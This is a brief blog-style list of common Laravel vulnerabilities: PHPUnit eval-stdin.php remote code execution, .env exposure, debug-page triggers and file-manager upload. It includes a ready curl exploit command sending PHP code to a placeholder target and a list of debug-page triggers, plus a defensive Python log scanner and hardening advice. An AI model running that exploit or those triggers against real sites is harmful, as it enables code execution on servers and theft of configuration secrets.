Common Bugs in Laravel

First of all, I would like to thank mas Ade, the owner of the blog

Laravel Phpunit RCE (Remote Code Execution)

Vulnerable path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
Vulnerability indicator: blank page

Exploit: curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


Laravel .env (Laravel Environment)

Impact: Sensitive information exposure
Vulnerability indicator:

Laravel App Debug

Impact: Sensitive information exposure (paths, .env configuration)
How to trigger:
1. Use SQL injection queries/strings in POST and GET data
2. Request the path /logout (
3. Use buffer overflow (very long) input in a form or URL (ex: site/xxxxxxxxx/)
4. Append [] to an existing parameter (POST or GET)

Laravel File Manager

Impact: Arbitrary file upload
Vulnerable path: /laravel-filemanager/
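As an added example (not from the original post), here is a small Python detector that runs over constructed access-log lines and flags requests to the exposure points listed above: the phpunit eval-stdin.php path, /.env, the laravel-filemanager path, and the APP_DEBUG triggers ([] appended to a parameter, overlong path segment). The combined log format, the 200-character threshold for the "long URL" trigger and the sample lines are assumptions.

```python
import re
from urllib.parse import unquote

# Request paths this post lists as exposure points, as patterns.
SUSPICIOUS_PATHS = {
    "phpunit_eval_stdin": re.compile(r"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin\.php", re.I),
    "dotenv_exposure": re.compile(r"(^|/)\.env($|[?#])", re.I),
    "laravel_filemanager": re.compile(r"/laravel-filemanager/", re.I),
}
# Debug-page triggers from the list above: "[]" appended to a parameter name,
# or an overlong path segment (the post's example uses repeated x's).
ARRAY_PARAM = re.compile(r"[?&][^=&]*\[\]=")
LONG_SEGMENT = 200  # assumption: segments longer than this count as the "long URL" trigger

# Combined (Apache/nginx style) access log line: ip - - [ts] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) ')

def classify_request(path: str) -> list:
    """Return the list of findings for one request path (empty if none)."""
    findings = []
    decoded = unquote(path)  # catch percent-encoded variants of the same path
    for name, pattern in SUSPICIOUS_PATHS.items():
        if pattern.search(decoded):
            findings.append(name)
    if ARRAY_PARAM.search(decoded):
        findings.append("array_param_debug_trigger")
    if any(len(seg) > LONG_SEGMENT for seg in decoded.split("?")[0].split("/")):
        findings.append("long_segment_debug_trigger")
    return findings

def scan_log(lines):
    """Yield (ip, method, path, status, findings) for every flagged line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        findings = classify_request(path)
        if findings:
            yield ip, method, path, int(status), findings

# Constructed sample lines (not real traffic) in combined log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 0 "-" "curl/7.88"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /.env HTTP/1.1" 200 1342 "-" "curl/7.88"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q[]=test HTTP/1.1" 500 5210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:05 +0000] "GET /laravel-filemanager/upload HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "GET /products/42 HTTP/1.1" 200 7310 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 on the eval-stdin.php or /.env line means the file is actually being served and the fix is to keep vendor/ and .env outside the web root and set APP_DEBUG=false; a 500 on a [] request is the debug page trigger firing.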

Thanks to: & Ade Little

-William Laurent
